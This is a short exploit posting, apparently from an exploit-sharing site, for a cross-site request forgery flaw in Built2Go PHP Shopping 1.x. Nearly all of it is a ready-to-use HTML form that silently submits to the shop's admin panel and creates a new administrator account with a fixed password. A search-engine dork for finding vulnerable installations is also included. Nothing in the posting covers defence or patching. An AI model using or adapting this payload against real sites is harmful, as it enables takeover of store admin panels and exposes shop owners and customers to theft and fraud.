facebook facebook twitter rss

Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin)

Author: AtT4CKxT3rR0r1ST , Published: 09-01-2014
Built2Go PHP Shopping v 1.x – CSRF Vulnerability(add admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.built2go.com/
.:. Dork : “Powered by Built2Go PHP Shopping”
####################################################################

===[ Exploit ]===

<form method=”POST” name=”form0″ action=”http://SITE/adminpanel/edit_admin.php”>
<input type=”hidden” name=”userid” value=”ADMIN”/>
<input type=”hidden” name=”pass” value=”12121212″/>
<input type=”hidden” name=”retypepass” value=”12121212″/>
<input type=”hidden” name=”addnew” value=”1″/>
<input type=”hidden” name=”action” value=”save”/>
<input type=”hidden” name=”new” value=”Submit”/>
</form>

</body>
</html>

####################################################################

Like us on Facebook :